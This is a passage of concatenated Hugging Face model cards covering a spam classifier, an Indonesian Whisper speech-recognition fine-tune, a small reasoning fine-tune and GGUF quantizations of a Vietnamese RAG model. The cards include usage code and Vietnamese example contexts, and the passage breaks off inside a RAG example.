<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuning-spam-model-5000-samples
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0333
- Accuracy: 0.9903
- F1: 0.9903
## Model description
More information needed
## Intended uses & limitations
More information needed
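As a usage sketch, the classifier can be called through the text-classification pipeline (the returned label names depend on how the model was exported and may not be human-readable):
```python
from transformers import pipeline

spam_classifier = pipeline(
    "text-classification",
    model="rytsar/finetuning-spam-model-5000-samples",
)
print(spam_classifier("Congratulations! You won a free prize, click here to claim it."))
```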
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
viraxeva/whisper-small-indonesian-common-voice | viraxeva | 2024-10-10T07:51:48Z | 124 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"whisper",
"automatic-speech-recognition",
"generated_from_trainer",
"id",
"dataset:mozilla-foundation/common_voice_17_0",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:apache-2.0",
"model-index",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-10-09T23:24:58Z | ---
library_name: transformers
language:
- id
license: apache-2.0
base_model: openai/whisper-small
tags:
- generated_from_trainer
datasets:
- mozilla-foundation/common_voice_17_0
metrics:
- wer
model-index:
- name: Whisper Small Indonesia - Vira Maftukhatul
results:
- task:
name: Automatic Speech Recognition
type: automatic-speech-recognition
dataset:
name: Common Voice 17.0
type: mozilla-foundation/common_voice_17_0
config: id
split: test
args: 'config: id, split: test'
metrics:
- name: Wer
type: wer
value: 20.066049583701567
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Whisper Small Indonesia - Vira Maftukhatul
This model is a fine-tuned version of [openai/whisper-small](https://huggingface.co/openai/whisper-small) on the Common Voice 17.0 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2891
- Wer: 20.0660
## Model description
More information needed
## Intended uses & limitations
More information needed
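A minimal transcription sketch with the 🤗 `pipeline` API is shown below; the audio file path is a placeholder, and forcing Indonesian decoding via `generate_kwargs` is an assumption rather than something documented in this card:
```python
# Minimal ASR sketch (assumption: standard Whisper usage; audio path is a placeholder)
from transformers import pipeline

asr = pipeline(
    "automatic-speech-recognition",
    model="viraxeva/whisper-small-indonesian-common-voice",
)
result = asr(
    "sample_indonesian.wav",
    generate_kwargs={"language": "indonesian", "task": "transcribe"},
)
print(result["text"])
```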
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- training_steps: 500
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:------:|:----:|:---------------:|:-------:|
| 0.4167 | 0.2417 | 500 | 0.2891 | 20.0660 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
skdrx/amd135m_reasoning_finetune | skdrx | 2024-10-10T07:49:23Z | 24 | 0 | null | [
"safetensors",
"gguf",
"llama",
"dataset:nvidia/OpenMathInstruct-2",
"dataset:KingNish/reasoning-base-20k",
"base_model:amd/AMD-Llama-135m",
"base_model:quantized:amd/AMD-Llama-135m",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T07:46:32Z | ---
license: apache-2.0
datasets:
- nvidia/OpenMathInstruct-2
- KingNish/reasoning-base-20k
base_model:
- amd/AMD-Llama-135m
---
Finetune of AMD-Llama-135m using the ChatML format from the reasoning-base-20k dataset from KingNish. Trying to see if I can get this small model to reason. Improvements and suggestions welcome. Will upload the training script and dataset script soon (yell at me if I don't).
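A minimal generation sketch with 🤗 transformers is shown below; the ChatML-style prompt format is an assumption, since the training script has not been published yet:
```python
# Minimal generation sketch (assumption: ChatML-style prompt; adjust once the
# training script is published)
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "skdrx/amd135m_reasoning_finetune"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id)

prompt = "<|im_start|>user\nWhat is 17 + 25?<|im_end|>\n<|im_start|>assistant\n"
inputs = tokenizer(prompt, return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0][inputs["input_ids"].shape[1]:], skip_special_tokens=True))
```
|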
RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf | RichardErkhov | 2024-10-10T07:49:03Z | 11 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T04:27:59Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Vi-Qwen2-7B-RAG - GGUF
- Model creator: https://huggingface.co/AITeamVN/
- Original model: https://huggingface.co/AITeamVN/Vi-Qwen2-7B-RAG/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Vi-Qwen2-7B-RAG.Q2_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q2_K.gguf) | Q2_K | 2.81GB |
| [Vi-Qwen2-7B-RAG.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ3_XS.gguf) | IQ3_XS | 3.12GB |
| [Vi-Qwen2-7B-RAG.IQ3_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ3_S.gguf) | IQ3_S | 3.26GB |
| [Vi-Qwen2-7B-RAG.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K_S.gguf) | Q3_K_S | 3.25GB |
| [Vi-Qwen2-7B-RAG.IQ3_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ3_M.gguf) | IQ3_M | 3.33GB |
| [Vi-Qwen2-7B-RAG.Q3_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K.gguf) | Q3_K | 3.55GB |
| [Vi-Qwen2-7B-RAG.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K_M.gguf) | Q3_K_M | 3.55GB |
| [Vi-Qwen2-7B-RAG.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q3_K_L.gguf) | Q3_K_L | 3.81GB |
| [Vi-Qwen2-7B-RAG.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ4_XS.gguf) | IQ4_XS | 3.96GB |
| [Vi-Qwen2-7B-RAG.Q4_0.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_0.gguf) | Q4_0 | 4.13GB |
| [Vi-Qwen2-7B-RAG.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.IQ4_NL.gguf) | IQ4_NL | 4.16GB |
| [Vi-Qwen2-7B-RAG.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_K_S.gguf) | Q4_K_S | 4.15GB |
| [Vi-Qwen2-7B-RAG.Q4_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_K.gguf) | Q4_K | 4.36GB |
| [Vi-Qwen2-7B-RAG.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_K_M.gguf) | Q4_K_M | 4.36GB |
| [Vi-Qwen2-7B-RAG.Q4_1.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q4_1.gguf) | Q4_1 | 4.54GB |
| [Vi-Qwen2-7B-RAG.Q5_0.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_0.gguf) | Q5_0 | 4.95GB |
| [Vi-Qwen2-7B-RAG.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_K_S.gguf) | Q5_K_S | 4.95GB |
| [Vi-Qwen2-7B-RAG.Q5_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_K.gguf) | Q5_K | 5.07GB |
| [Vi-Qwen2-7B-RAG.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_K_M.gguf) | Q5_K_M | 5.07GB |
| [Vi-Qwen2-7B-RAG.Q5_1.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q5_1.gguf) | Q5_1 | 5.36GB |
| [Vi-Qwen2-7B-RAG.Q6_K.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q6_K.gguf) | Q6_K | 5.82GB |
| [Vi-Qwen2-7B-RAG.Q8_0.gguf](https://huggingface.co/RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf/blob/main/Vi-Qwen2-7B-RAG.Q8_0.gguf) | Q8_0 | 7.54GB |
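Any of the files above can be loaded with llama.cpp-compatible tooling. For example, a minimal `llama-cpp-python` sketch (the file choice and chat usage are assumptions, not instructions from the original model card):
```python
# Minimal llama-cpp-python sketch (assumptions: Q4_K_M file, default chat handling)
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="RichardErkhov/AITeamVN_-_Vi-Qwen2-7B-RAG-gguf",
    filename="Vi-Qwen2-7B-RAG.Q4_K_M.gguf",
    n_ctx=8192,
)
out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Xin chào!"}],
    max_tokens=128,
)
print(out["choices"][0]["message"]["content"])
```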
Original model description:
---
base_model: Qwen/Qwen2-7B-Instruct
language:
- vi
license: apache-2.0
tags:
- retrieval-augmented-generation
- text-generation-inference
library_name: transformers
pipeline_tag: text-generation
---
## Model Card: Vi-Qwen2-7B-RAG
**Model description:**
Vi-Qwen2-7B-RAG is a large language model fine-tuned from the base model Qwen2-7B-Instruct (https://huggingface.co/Qwen/Qwen2-7B-Instruct) for RAG tasks. The model was trained on Vietnamese data with the goal of improving Vietnamese language processing and raising performance on Retrieval Augmented Generation (RAG) tasks.
**Intended use:**
Vi-Qwen2-7B-RAG is designed specifically for RAG (it accepts contexts of up to 8192 tokens), so it can handle the following cases:
* Noise robustness: the model extracts useful information from noisy documents (1 positive + 4 negatives, or 1 negative).
* Negative rejection: the model refuses to answer when the required knowledge is not present in any retrieved document (1-6 negatives).
* Information integration: the model answers complex questions that require integrating information from multiple documents (2-part positive + 3 negatives, or 3-part positive + 2 negatives).
* Positive/negative identification: the model determines whether the context contains the answer to the question (accuracy of roughly 99%).
We also provide smaller models suited to different use cases, such as Vi-Qwen2-1.5B-RAG (https://huggingface.co/AITeamVN/Vi-Qwen2-1.5B-RAG)
and Vi-Qwen2.5-3B-RAG (https://huggingface.co/AITeamVN/Vi-Qwen2-3B-RAG)
* Beyond RAG tasks, you can still use our model as a normal chatbot, and even ask follow-up questions about an input context.
**Limitations:**
Because the model is designed specifically for RAG tasks, it may have the following limitations:
* Accuracy is not guaranteed for questions related to politics, society, etc.
* It may exhibit bias or inappropriate viewpoints.
**Usage:**
#### 1. Basic usage
The input contains only a single context (1 positive or 1 negative).
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
path = 'AITeamVN/Vi-Qwen2-7B-RAG'
model = AutoModelForCausalLM.from_pretrained(
path,
torch_dtype=torch.bfloat16,
device_map="auto",
use_cache=True
)
tokenizer = AutoTokenizer.from_pretrained(path)
system_prompt = "Bạn là một trợ lí Tiếng Việt nhiệt tình và trung thực. Hãy luôn trả lời một cách hữu ích nhất có thể."
template = '''Chú ý các yêu cầu sau:
- Câu trả lời phải chính xác và đầy đủ nếu ngữ cảnh có câu trả lời.
- Chỉ sử dụng các thông tin có trong ngữ cảnh được cung cấp.
- Chỉ cần từ chối trả lời và không suy luận gì thêm nếu ngữ cảnh không có câu trả lời.
Hãy trả lời câu hỏi dựa trên ngữ cảnh:
### Ngữ cảnh :
{context}
### Câu hỏi :
{question}
### Trả lời :'''
# Example
context = '''Thuốc Insuact 10 trị bệnh gì? Thuốc Insuact 10mg có thành phần chính là Atorvastatin. Thuốc Insuact 10 có tác dụng làm giảm cholesterol và triglycerid trong máu ở bệnh nhân tăng cholesterol máu nguyên phát, rối loạn lipid máu hỗn hợp. 1. Thuốc Insuact 10 trị bệnh gì? Thuốc Insuact 10 thuộc nhóm thuốc điều trị rối loạn lipid máu, có thành phần chính là Atorvastatin 10mg. Atorvastatin có tác dụng làm giảm cholesterol, ức chế enzym tạo cholesterol ở gan. Atorvastatin làm giảm cholesterol chung bao gồm cholesterol LDL , triglycerid trong máu. Thuốc Insuact 10mg được bào chế dưới dạng viên nén bao phim, được chỉ định dùng trong những trường hợp sau: Ðiều trị hỗ trợ tăng cholesterol máu nguyên phát và rối loạn lipid máu hỗn hợp trên bệnh nhân đang áp dụng chế độ ăn kiêng để làm giảm cholesterol toàn phần , cholesterol LDL , apolipoprotein B, triglycerid và tăng cholesterol HDL . Insuact 10 cũng được dùng để điều trị rối loạn betalipoprotein trong máu nguyên phát. Ðiều trị hỗ trợ tăng cholesterol trong máu có tính gia đình đồng hợp tử trên bệnh nhân đang áp dụng các biện pháp làm giảm lipid khác để làm giảm cholesterol toàn phần và cholesterol LDL. 2. Liều dùng và cách dùng thuốc Insuact 10 Cách dùng thuốc Insuact 10: Thuốc được dùng theo đường uống, uống khi bụng đói hoặc no đều được, có thể uống vào bất cứ lúc nào trong ngày. Liều dùng thuốc Insuact 10mg khởi đầu là 10mg/lần/ngày, tối đa là 80mg/lần/ngày. Liều dùng thuốc Insuact 10 tùy vào mục đích điều trị cụ thể như sau: Tăng cholesterol máu nguyên phát và rối loạn lipid máu phối hợp: 10mg/lần/ngày, sau 2 - 4 tuần sẽ thấy hiệu quả của thuốc. Thuốc cần được được sử dụng duy trì trong thời gian dài để có hiệu quả. Tăng cholesterol trong máu có tính gia đình đồng hợp tử: Liều thường dùng là thuốc Insuact 10mg /lần/ngày và tối đa là 80mg/lần/ngày. Rối loạn lipid máu nghiêm trọng ở trẻ từ 10 - 17 tuổi: 10mg/lần/ngày, sau đó tăng lên 20mg/lần/ngày tùy vào cơ địa, tiến triển bệnh và khả năng dung nạp thuốc của người bệnh. Thời gian điều chỉnh liều thuốc tối thiểu là 4 tuần. 3. Tác dụng phụ của thuốc Insuact 10mg Thuốc Insuact 10 có thể gây một số tác dụng phụ không mong muốn với tần suất như sau: Thường gặp: Viêm mũi - họng, phản ứng dị ứng, tăng đường huyết, nhức đầu, đau thanh quản, chảy máu cam , đau cơ, co thắt cơ, đau khớp, sưng khớp, đau các chi, đau lưng, xét nghiệm gan bất thường, tăng creatine kinase trong máu, buồn nôn, khó tiêu, đầy hơi, táo bón, tiêu chảy. Ít gặp: Insuact 10 ít gây hạ đường huyết, tăng cân, chán ăn, mất ngủ, gặp ác mộng, choáng váng, dị cảm, mất trí nhớ, giảm cảm giác, loạn vị giác , nôn, đau bụng, ợ hơi, viêm tụy, viêm gan, nổi mày đay , phát ban, ngứa, rụng tóc, đau cổ, mỏi cơ, mệt mỏi, suy nhược, đau ngực, phù ngoại biên, sốt, xuất hiện bạch cầu trong nước tiểu, nhìn mờ, ù tai. Hiếm gặp: Insuact 10 hiếm khi làm giảm tiểu cầu, bệnh lý thần kinh ngoại biên, hoa mắt, ứ mật, phù thần kinh, nổi hồng ban, hội chứng hoại tử da nhiễm độc , hội chứng Stevens-Johnson , bệnh cơ, viêm cơ, tiêu cơ vân, bệnh gân, đôi khi nghiêm trọng hơn có thể đứt gân. Rất hiếm gặp: Insuact 10 rất hiếm khi gây sốc phản vệ , mất thính giác , suy gan , hội chứng to vú ở nam giới. Không rõ tần suất: Hoại tử cơ tự miễn trung gian. 4. Một số lưu ý khi dùng thuốc Insuact 10mg Không dùng thuốc Insuact với người bị quá mẫn với thành phần của thuốc, người có bệnh gan hoạt động hoặc tăng transaminase huyết thanh vô căn kéo dài, phụ nữ đang mang thai hoặc nuôi con cho bú, phụ nữ đang có ý định mang thai. 
Thuốc Insuact 10mg chỉ được dùng ở bệnh nhân có nguy cơ xơ vữa mạch máu cao do tăng cholesterol trong máu và phải kết hợp với chế độ ăn kiêng ít chất béo bão hòa , ít cholesterol và người bệnh đang áp dụng các biện pháp điều trị không dùng thuốc khác. Trước khi điều trị với Insuact 10 , người bệnh cần được loại trừ các nguyên nhân thứ phát gây tăng cholesterol bao gồm suy tuyến giáp , tiểu đường khó kiểm soát, hội chứng thận hư, nghiện rượu, bệnh gan tắc nghẽn, rối loạn protein trong máu, .... Ngoài ra, người bệnh cũng cần được kiểm tra, đo lường nồng độ lipid máu. Trước khi điều trị với thuốc Insuact 10mg , cần kiểm tra chức năng gan và trong quá trình dùng thuốc, người bệnh cần theo dõi, kiểm tra chức năng gan thường xuyên. Người có tiền sử mắc bệnh gan do rượu, bị nghiện rượu cần thận trọng khi dùng Insuact 10 . Trước khi dùng thuốc, người bệnh cần được cảnh báo nguy cơ gặp phải các vấn đề về cơ như căng cơ , đau cơ, yếu cơ. Thuốc Insuact 10mg có thể tương tác với các thuốc: Tăng nguy cơ tổn thương cơ (đặc biệt cơ vân) khi dùng đồng thời với thuốc điều trị viêm gan C và HIV, hạ cholesterol máu nhóm fibrat khác, thuốc ức chế miễn dịch; tăng thời gian chảy máu hoặc thời gian prothrombin khi dùng phối hợp với thuốc chống đông, indandione; tăng nhẹ nồng độ digoxin trong huyết thanh khi dùng phối hợp với Digoxin'''
question = '''Insuact 10mg được chỉ định dùng trong những trường hợp nào và liều dùng cụ thể ra sao?'''
conversation = [{"role": "system", "content": system_prompt }]
conversation.append({"role": "user", "content": template.format(context = context, question = question)})
text = tokenizer.apply_chat_template(
conversation,
tokenize=False,
add_generation_prompt=True)
model_inputs = tokenizer(text,return_tensors="pt").to(model.device)
generated_ids = model.generate(
model_inputs.input_ids,
max_new_tokens=2048,
temperature = 0.1,
#top_p=0.95,
#top_k=40,
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
print(response)
'''Trả lời:
Dựa trên ngữ cảnh cung cấp, Insuact 10mg được chỉ định dùng trong các trường hợp sau:
1. **Điều trị hỗ trợ tăng cholesterol máu nguyên phát và rối loạn lipid máu hỗn hợp**:
- **Liều dùng**: 10mg/lần/ngày.
- **Hiệu quả**: Sau 2 - 4 tuần sử dụng, bệnh nhân sẽ thấy hiệu quả của thuốc.
- **Lưu ý**: Thuốc cần được sử dụng duy trì trong thời gian dài để có hiệu quả.
2. **Điều trị hỗ trợ tăng cholesterol trong máu có tính gia đình đồng hợp tử**:
- **Liều dùng**: 10mg/lần/ngày (liều thường dùng) và tối đa 80mg/lần/ngày.
- **Lưu ý**: Liều lượng có thể được điều chỉnh tùy theo cơ địa, tiến triển bệnh và khả năng dung nạp thuốc của người bệnh.
3. **Rối loạn lipid máu nghiêm trọng ở trẻ từ 10 - 17 tuổi**:
- **Liều dùng**: 10mg/lần/ngày, sau đó có thể tăng lên 20mg/lần/ngày tùy theo tình trạng bệnh.
- **Thời gian điều chỉnh liều**: Thời gian điều chỉnh liều tối thiểu là 4 tuần.
**Lưu ý chung**:
- Thuốc được dùng theo đường uống, uống khi bụng đói hoặc no đều được, có thể uống vào bất cứ lúc nào trong ngày.
- Không dùng thuốc Insuact 10mg với người bị quá mẫn với thành phần của thuốc, người có bệnh gan hoạt động hoặc tăng transaminase huyết thanh vô căn kéo dài, phụ nữ đang mang thai hoặc nuôi con cho bú, phụ nữ đang có ý định mang thai.
- Cần kiểm tra chức năng gan trước và trong quá trình điều trị.
'''
```
#### 2. Noise robustness
```python
# Example
context = '''- Ngữ cảnh 1: . Và dù nguyên nhân thế nào, thì việc đánh người khác đều không thể chấp nhận, không ai có quyền xâm phạm thân thể của người khác, nhất là đánh những đứa trẻ là bạn của con cái mình. Lựa chọn kể với cha mẹ, người lớn về các mâu thuẫn học đường, là quyết định rất đúng của các em. Nhưng người lớn, đặc biệt những ông bố, bà mẹ cần ứng xử ra sao trước xung đột này của các con, thưa bà? Đứng ngoài mâu thuẫn bằng sự khách quan và trách nhiệm nhất có thể. Điều này giúp chúng ta đủ bình tĩnh để làm việc với tất cả các bên liên quan, từ giáo viên, bạn của con, ban giám hiệu để tìm hiểu câu chuyện và tìm kiếm cách giải quyết tích cực, trên cơ sở phối hợp nhà trường. Người lớn không thể chỉ nghe một tai và đặc biệt không nên tự xử. Phụ huynh, kể cả học sinh tự xử các vấn đề học đường là điều rất nguy hiểm và cho thấy sự coi thường pháp luật . Vụ việc ở Tuyên Quang vừa rồi là ví dụ. Các em hoàn toàn có thể phản ứng bằng cách trình bày, gửi yêu cầu, kiến nghị lên nhà trường, nhờ phụ huynh làm việc với ban giám hiệu để có biện pháp giải quyết nếu cô giáo sai, không nên đồng loạt dồn cô giáo vào tường một cách bạo lực và trái đạo đức, tôn ti trật tự như vậy. Ngoài ra, chúng ta cũng có rất nhiều cơ quan chức năng bảo vệ phụ huynh và con em, với những quyền về khiếu nại, tố cáo. Chúng ta nói nhiều về trường học an toàn. Trong những câu chuyện học sinh bị hành hung thế này, có lẽ cũng cần làm rõ vai trò, trách nhiệm của nhà trường? TPHCM và nhiều địa phương đang xây dựng môi trường trường học hạnh phúc, tiêu chí là yêu thương, an toàn, tôn trọng. Không chỉ phòng ngừa, nhà trường còn phải tích cực vào cuộc xử lý các mâu thuẫn học đường, hạn chế tối đa nguy cơ mất an toàn cho học sinh, giáo viên. Đặc biệt, giải quyết câu chuyện bạo lực học đường phải triệt để, tuyệt đối không nửa vời vì nửa vời sẽ tiềm ẩn nguy cơ rất lớn dẫn đến những vụ việc tương tự, với mức độ nghiêm trọng hơn. Vụ việc em M. ở Nha Trang tự vẫn với lá thư tuyệt mệnh bị đổ oan đầu tháng 10 vừa qua là một ví dụ về giải quyết không triệt để. Việc xây dựng trường học hạnh phúc nếu triển khai “đến nơi đến chốn”, sẽ góp phần rất lớn cải thiện tình trạng bạo lực học đường, tạo môi trường sống và học tập bình an cho các con. Từ nhiều sự vụ học sinh bạo hành lẫn nhau, giáo viên bạo hành học sinh, phụ huynh hành hung giáo viên và bạn của con. Tam giác phối hợp bảo vệ học sinh là nhà trường - gia đình - xã hội phải chăng đang có một lỗ hổng lớn, thưa bà? Câu chuyện này có liên quan đến niềm tin của phụ huynh với nhà trường. Tại sao phụ huynh lại chọn cách tự xử? Chúng ta cũng cần phải xem lại cách giải quyết vấn đề của nhà trường đã rốt ráo chưa, coi trọng lợi ích của tất cả các bên liên quan chưa hay chỉ đang xoa dịu? Người ta chỉ tìm đến nhau khi có niềm tin vào nhau. Thực trạng phụ huynh chọn cách chuyển trường cho con cũng nói lên điều này. Đây là cách chạy trốn của phụ huynh với mong muốn con được an toàn, hạnh phúc hơn ở môi trường mới. Xây dựng niềm tin cho phụ huynh, xã hội cần được chú trọng và với mỗi một trường hợp phụ huynh yêu cầu chuyển trường cho con - đang rất phổ biến - nhà trường cần xét kỹ các nguyên nhân và hóa giải. Xin bà cho biết đâu là giải pháp căn cơ cho tất cả những câu chuyện bạo lực nói trên? Để trẻ không là nạn nhân của bạo lực học đường, phụ huynh cần đồng hành và giúp con có sự hiểu biết, ý thức trước vấn đề này. Dạy con kỹ năng giao tiếp, quản lý cảm xúc rất quan trọng và điều này không thể chỉ dựa vào những khóa học kỹ năng sống, mà là từ cách cư xử của người lớn, cha mẹ, thầy cô. 
Không có tấm gương nào tốt hơn cho con trẻ bằng ứng xử, hành vi của người lớn. Vì vậy, không thể đòi hỏi trẻ nói không với bạo lực học đường khi trong chính từng gia đình, xã hội, người lớn vẫn đối xử với nhau bằng bạo lực.
- Ngữ cảnh 2: Tại sao triều Thanh có rất nhiều thân vương nhưng chẳng có ai dám tạo phản? Không giống như những triều đại trước đó, triều Thanh dù có sự tranh giành ngai vàng khốc liệt giữa các hoàng tử nhưng lại chẳng bao giờ xảy ra thế cục các thân vương tạo phản. Chính vì 3 lý do lớn này đã khiến cho triều đại nhà Thanh khác hẳn triều đại nhà Đường và nhà Minh. Trong thời cổ đại, các vương công quý tộc để tranh giành vương vị của mình, giữa huynh đệ ruột thịt với nhau dường như đều xảy ra đấu đá, hãm hại lẫn nhau, coi nhau như kẻ thù không đội trời chung, có ta thì không có ngươi, có ngươi thì sẽ chẳng có ta, điều này hoàn toàn không phải là điều gì xa lạ. Vậy thì tại sao ngai vàng lại có sức hút lớn đến thế? Không chỉ là đàn ông khát khao quyền lực, mà quan trọng hơn là hoàng đế có thể có được hậu cung rộng lớn, trong hậu cung còn có vô số các mỹ nữ quốc sắc thiên hương. Nhiều phi tần như vậy, đương nhiên hoàng đế cũng sẽ có rất nhiều con cái, không tính đến con gái, chỉ riêng những vị hoàng tử, để có thể có được hoàng vị, họ tranh giành nhau bằng cả sinh mạng. Vậy thì ai là người được lựa chọn để thừa kế ngai vàng, ai mới có thể gánh được trọng trách trị vì đất nước? Đa phần đều theo tục lệ truyền cho con trai đích tôn (con trai do hoàng hậu sinh ra) hoặc con trai trưởng (con trai đầu tiên của hoàng đế). Cho dù tục lệ này có lịch sử lâu đời nhưng nó cũng có những khuyết điểm rất lớn, đó chính là nếu như năng lực và chí hướng của con trai đích tôn hoặc con trai trưởng không thể gánh vác được ngai vị, nếu để anh ta lên ngôi hoàng đế, vậy thì đất nước sẽ rơi vào cục diện suy vong. Còn có một khuyết điểm nữa đó chính là những người con trai có dã tâm lớn khác sẽ không phục việc con trai đích hoặc con trai trưởng kế thừa ngôi báu, họ sẽ khởi binh tạo phản cũng là chuyện rất dễ xảy ra. Ví dụ như trong thời Đường của Trung Quốc, Đường Cao Tổ Lý Uyên đem binh tiêu diệt nhà Tùy thối nát, đồng thời lập nên nhà Đường, vốn dĩ ông cũng dựa theo tục lệ lập con trai trưởng là Lý Kiến Thành làm Thái tử nhưng con trai thứ là Lý Thế Dân lại không phục với sự sắp xếp này. Vì năng lực của ông xuất chúng, văn võ song toàn, còn lập được không ít công lao to lớn trong cuộc chiến tranh tiêu diệt nhà Tùy cùng cha mình, đương nhiên không chịu thấp hơn kẻ khác một bậc. Thế nên đã phát động binh biến Huyền Vũ Môn, trong cuộc binh biến tạo phản này, đích thân ông đã giết chết huynh trưởng của mình, đồng thời ép cha mình là Lý Uyên phải truyền ngôi cho mình. Hay như trong thời nhà Minh của Trung Quốc, trước khi Chu Nguyên Chương chọn người lập làm Thái tử, con trai trưởng Chu Tiêu đã qua đời vì bệnh nặng, thế nên Chu Nguyên Chương đã lập cháu đích tôn của mình làm Thái tử kế thừa vương vị, nhưng em trai của Chu Tiêu là Chu Đệ lại không phục lựa chọn này của Chu Nguyên Chương. Theo lý mà nói thì sau khi anh trai Chu Tiêu qua đời, ông đã có tư cách thừa kế ngai vàng nhưng Chu Nguyên Chương nhất quyết không chọn ông mà lại chọn người cách thế hệ để truyền ngôi. Điều này khiến Chu Đệ với thế lực to lớn không thể nuốt nổi cục tức này, vì thế Chu Tiêu vừa qua đời thì ông đã vội vã khởi binh tạo phản, giết chết cháu trai ruột của mình rồi tự xưng vương. Vậy thì tại sao trong triều Thanh có rất nhiều thân vương như vậy mà lại chẳng có ai đứng ra tạo phản? Đầu tiên phải nói về bối cảnh xã hội trong thời kỳ này. Triều Thanh từ khi thành lập, cũng giống với những triều đại khác, đều có rất nhiều thân vương. 
